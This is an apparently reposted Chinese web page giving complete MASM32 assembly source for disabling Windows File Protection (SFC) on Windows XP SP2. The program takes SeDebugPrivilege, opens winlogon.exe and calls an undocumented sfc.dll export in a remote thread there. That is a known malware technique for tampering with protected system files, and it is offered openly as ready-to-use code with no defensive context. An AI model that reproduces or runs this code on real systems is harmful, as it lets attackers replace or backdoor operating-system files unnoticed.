关闭SFC[文件保护]的源代码

来源:互联网 发布:c语言 md5加密解密 编辑:IT博客网 时间:2020/02/24 03:25
WindowsXP Professional SP2测试通过.

.386
.Model Flat,StdCall
Option CaseMap :None

Include /Masm32/Include/Windows.inc
Include /Masm32/Include/User32.inc
Include /Masm32/Include/Shell32.inc
Include /Masm32/Include/Kernel32.inc
Include /Masm32/Include/Advapi32.inc

IncludeLib /Masm32/Lib/User32.lib
IncludeLib /Masm32/Lib/Shell32.lib
IncludeLib /Masm32/Lib/Kernel32.lib
IncludeLib /Masm32/Lib/Advapi32.lib

.Data
stProcess db "winlogon.exe",0

.Data?
hFile dd ?
dwProcessID dd ?
hProcess dd ?
lpLoadLibrary dd ?
lpDllName dd ?
szDllPath db 260 dup(?)
szSysPath db 260 dup(?)
hToken dd ?
tkp TOKEN_PRIVILEGES<>
sdnv LUID <>

.Code
EnableDebugPriv Proc
invoke GetCurrentProcess
invoke OpenProcessToken,eax,TOKEN_ADJUST_PRIVILEGES or TOKEN_QUERY,addr hToken
invoke LookupPrivilegeValue,0,CTEXT("SeDebugPrivilege"),addr sdnv
mov tkp.PrivilegeCount,1
m2m tkp.Privileges.Luid.LowPart,sdnv.LowPart
m2m tkp.Privileges.Luid.HighPart,sdnv.HighPart
mov tkp.Privileges.Attributes,SE_PRIVILEGE_ENABLED
invoke AdjustTokenPrivileges,hToken,FALSE,addr tkp,sizeof tkp,0,0
invoke CloseHandle,hToken
ret
EnableDebugPriv EndP

CloseSFC Proc
Local @stProcess:PROCESSENTRY32
Local @hSnapShot
Local @hProcess
Local @hSfc

invoke RtlZeroMemory,addr @stProcess,sizeof @stProcess
mov @stProcess.dwSize,sizeof @stProcess
invoke CreateToolhelp32Snapshot,TH32CS_SNAPPROCESS,0
mov @hSnapShot,eax
invoke Process32First,@hSnapShot,addr @stProcess
.While eax
invoke lstrcmpi,addr @stProcess.szExeFile,addr stProcess
.if eax == 0
invoke OpenProcess,PROCESS_CREATE_THREAD or PROCESS_VM_OPERATION or PROCESS_VM_WRITE,FALSE,@stProcess.th32ProcessID
.if eax
mov @hProcess,eax
invoke LoadLibrary,CTEXT("sfc.dll")
mov @hSfc,eax
invoke GetProcAddress,eax,2
push eax
invoke FreeLibrary,@hSfc
pop eax
.if eax
invoke CreateRemoteThread,@hProcess,0,0,eax,0,0,0
.if eax
invoke CloseHandle,eax
ret
.endif
.endif
.endif
.endif
invoke Process32Next,@hSnapShot,addr @stProcess
.EndW
invoke CloseHandle,@hSnapShot
ret

CloseSFC EndP

Start:
Call EnableDebugPriv
Call CloseSFC
invoke ExitProcess,0
End Start